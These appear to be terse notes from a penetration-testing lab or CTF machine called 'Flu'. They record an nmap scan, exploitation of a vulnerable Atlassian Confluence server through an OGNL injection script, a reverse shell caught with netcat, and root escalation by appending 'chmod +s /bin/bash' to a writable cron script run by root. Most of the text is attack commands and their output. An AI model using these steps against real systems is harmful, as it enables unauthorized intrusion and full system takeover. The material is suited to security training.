$ sudo nmap -sCV -p- -v -Pn --open 192.168.244.41 > Flu.txt
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  http     Apache Tomcat (language: en)
| http-title: Log In - Confluence
|_Requested resource was /login.action?os_destination=%2Findex.action&permissionViolation=true
|_http-favicon: Unknown favicon MD5: 966E60F8EB85B7EA43A7B0095F3E2336
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8091/tcp open  jamlink?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Wed, 03 Jun 2026 00:42:28 GMT
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Wed, 03 Jun 2026 00:41:58 GMT
|     Connection: Close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 03 Jun 2026 00:41:58 GMT
|     Connection: Close
|     content-length: 0
|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 414 Request-URI Too Long
|     text is empty (possibly HTTP/0.9)
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 03 Jun 2026 00:41:58 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   SIPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 03 Jun 2026 00:42:33 GMT
|     Connection: Keep-Alive
|_    content-length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

at port 8090
Atlassian Confluence 7.13.6
CVE : CVE-2022-26123
https://github.com/jbaines-r7/through_the_wire/blob/main/through_the_wire.py
python3 exploit.py --rhost 192.168.244.41 --rport 8090 --lhost 192.168.45.154 --protocol http:// --read-file /etc/passwd

confluence:x:1001:1001:Atlassian Confluence:/home/confluence:/bin/sh

$ python3 OGNL_Confluence.py --rhost 192.168.244.41 --rport 8090 --lhost 192.168.45.154 --protocol http:// --reverse-shell
get a shell.

$ rlwrap nc -nlvp 4444        
listening on [any] 4444 ...
connect to [192.168.45.154] from (UNKNOWN) [192.168.244.41] 34542
bash: cannot set terminal process group (841): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/tmp$ id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)

# pspy64 found root will run /opt/log-backup.sh every minutes, and confluence have write permission to this script.
/bin/bash /opt/log-backup.sh
tar -czf /root/backup/log_backup_20260603010301.tar.gz /root/backup/log_backup_20260603010301
find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ;
ls -la /opt/log-backup.sh
-rwxr-xr-x 1 confluence confluence 408 Dec 12  2023 /opt/log-backup.sh

# add one line payload at the end of /opt/log-backup.sh
echo "chmod +s /bin/bash" >> /opt/log-backup.sh

ls -la /bin/bash
-rwsr-sr-x 1 root root 1437832 Jan  7  2023 /bin/bash

confluence@flu:/opt/atlassian/confluence/logs$ /bin/bash -p
bash-5.2# id
uid=1001(confluence) gid=1001(confluence) euid=0(root) egid=0(root) groups=0(root),1001(confluence)


